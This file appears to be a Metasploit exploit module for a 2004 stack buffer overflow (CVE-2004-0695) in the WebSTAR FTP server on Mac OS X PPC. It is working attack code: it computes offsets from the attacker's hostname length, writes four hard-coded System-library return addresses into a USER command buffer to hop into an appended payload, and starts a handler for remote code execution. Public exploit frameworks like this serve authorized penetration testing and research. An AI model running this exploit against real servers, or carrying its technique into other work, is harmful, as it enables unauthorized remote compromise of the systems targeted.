GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/ftp/webstar_ftp_user.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  # Module metadata for CVE-2004-0695 (OSVDB 7794, BID 10720): a single
  # Mac OS X 10.3.4-10.3.6 PPC target whose 'Rets' array holds the four
  # System library addresses used as hops in #exploit. The same four
  # addresses appear in the commented-out pack('N') notes below #initialize.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WebSTAR FTP Server USER Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the logging routine
        of the WebSTAR FTP server. Reliable code execution is
        obtained by a series of hops through the System library.
      },
      'Author' => [ 'ddz', 'hdm' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2004-0695'],
          [ 'OSVDB', '7794'],
          [ 'BID', '10720'],

        ],
      'Privileged' => true,
      'Payload' =>
        {
          # 300 bytes are reserved for the encoded payload appended in #exploit.
          'Space' => 300,
          # NUL, space, LF and CR are excluded from the payload and from the
          # rand_text_alphanumeric filler (payload_badchars) in #exploit.
          'BadChars' => "\x00\x20\x0a\x0d",
          'Compat' =>
            {
              # NOTE(review): '+find' restricts payload selection to find-socket
              # connection types — confirm against the payload compat rules.
              'ConnectionType' => "+find"
            },
        },
      'Platform' => %w{ osx },
      'Targets' =>
        [
          [
            'Mac OS X 10.3.4-10.3.6',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              # Index order matters: [0]..[3] are consumed by name in #exploit.
              'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],
            },
          ],
        ],
      'DisclosureDate' => '2004-07-13',
      'DefaultTarget' => 0))

    register_options(
      [
        # Optional; when unset, #exploit falls back to Rex::Socket.source_address.
        # Its length feeds the offset arithmetic in #exploit, so it must match
        # how the target actually resolves this host.
        OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),
      ], self)
  end

  # crazy dino 5-hop foo
  #$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120
  #$r28 = pack('N', 0x90034d60); # getgid()
  #$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30
  #$r30 = pack('N', 0x90023590); # call $r3

  # Builds the USER argument, sends it, then a HELP command, and runs the
  # payload handler before disconnecting. The buffer is alphanumeric filler
  # (bad chars excluded) with the four 'Rets' addresses written big-endian
  # ('N') at fixed offsets from +basel+, followed by the encoded payload.
  #
  # @return [void]
  def exploit
    connect

    # The offset to the return address is dependent on the length of our hostname
    # as the target system resolves it ( IP or reverse DNS ).
    mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])
    # Base offset: every in-buffer write below is relative to this value.
    basel = 285 - mhost.length

    print_status("Trying target #{target.name}...")

    # ret = 296
    # r25 = 260
    # r26 = 264
    # r27 = 268
    # r28 = 272
    # r29 = 276
    # r30 = 280
    # r31 = 284

    # r1+120 = 408

    # Total filler length leaves 56 bytes after the last fixed write
    # (basel + 136) before the payload is appended.
    buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
    # Each write overwrites 4 bytes in place; write order does not overlap.
    buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
    buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()
    buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
    buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3
    buf << payload.encoded

    # NOTE(review): second argument presumably asks the Ftp mixin to read the
    # server response after each command — confirm against send_cmd's signature.
    send_cmd( ['USER', buf] , true )
    send_cmd( ['HELP'] , true )

    handler
    disconnect
  end
end